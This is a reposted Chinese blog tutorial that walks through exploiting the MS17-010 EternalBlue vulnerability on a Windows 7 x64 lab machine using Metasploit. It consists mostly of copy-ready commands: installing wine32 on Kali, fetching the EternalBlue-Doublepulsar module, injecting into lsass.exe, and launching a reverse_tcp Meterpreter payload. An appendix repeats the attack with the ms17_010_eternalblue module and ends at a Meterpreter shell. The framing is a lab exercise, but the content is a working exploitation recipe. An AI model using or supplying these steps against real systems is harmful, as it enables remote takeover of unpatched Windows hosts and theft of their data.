• 永恒之蓝msf下 ms17_010 (64位kali下安装wine32)

    本次用到的环境:

    kali(2016.2)32位系统.ip地址:192.168.1.104

    目标靶机为:win7sp1x64系统(关闭防火墙),ip地址:192.168.1.105

    =================================

    若kali为64位

    windows为32

    需要安装wine32 ,但64位的kali下无法apt-get install wine32

    在执行exploit时会出现 :

    it looks like wine32 is missing, you should install it.
    multiarch needs to be enabled first. as root, please
    execute "dpkg --add-architecture i386 && apt-get update &&
    apt-get install wine32"

    按照上面的方法dpkg --add-architecture i386 && apt-get update &&
    apt-get install wine32即可

    =================================

    具体的步骤如下:

    kali系统下安装wine32:

    apt-get install wine32

     

    用wine32执行cmd.exe

    wine cmd.exe

     

    exit        //退出

     

     git  clone下载其利用脚本:

    git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

    然后将脚本拷贝到 /usr/share/metasploit-framework/modules/exploits/windows/smb

    cd    Eternalblue-Doublepulsar-Metasploit/
cp  -r  deps/  eternalblue_doublepulsar.rb    /usr/share/metasploit-framework/modules/exploits/windows/smb

     

    启动msf,然后进行一系列设置:

    service postgresql start
    
msfconsole

     

    search  eternalblue
    
use  exploit/windows/smb/eternalblue_doublepulsar

    复制代码
     set   DOUBLEPULSARPATH  /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

  set  ETERNALBLUEPATH   /usr/share/metasploit-framework/modules/exploits/windows/smb/deps

set PROCESSINJECT   lsass.exe

set TARGETARCHITECTURE  x64

set rhost  192.168.1.105

show targets

set target 9

set payload windows/x64/meterpreter/reverse_tcp

show options

set lhost 192.168.1.104

exploit
    复制代码

     

     

    附录:

    msf下的ms17-010模块:

    前提条件:

    1. gem install ruby_smb #ruby_smb模块安装

    2.msfupdate   #msf的更新

    3.msfconsole -qx "use exploit/windows/smb/ms17_010_eternalblue"  #启动并加载模块

    复制代码
    root@backlion:/opt# wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb

root@backlion:/opt# cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

Use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.21

msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >exploit

Meterpreter> sysinfo
    复制代码

     

     转载:https://www.cnblogs.com/backlion/p/6804863.html
  • 相关阅读:
    第一周2016/9/16
    团队项目计划会议
    电梯演讲视频
    团队项目成员与题目(本地地铁查询app)
    地铁查询相关问题汇总
    延长zencart1.5.x后台的15分钟登录时间和取消90天强制更换密码
    zencart1.5.x版管理员密码90天到期后台进入不了的解决办法
    通过SSH解压缩.tar.gz、.gz、.zip文件的方法
    html标签被div嵌套页面字体变大的解决办法
    zencart批量插入TEXT文本属性attributes
  • 原文地址:https://www.cnblogs.com/jjj-fly/p/8145587.html
Copyright © 2020-2023  润新知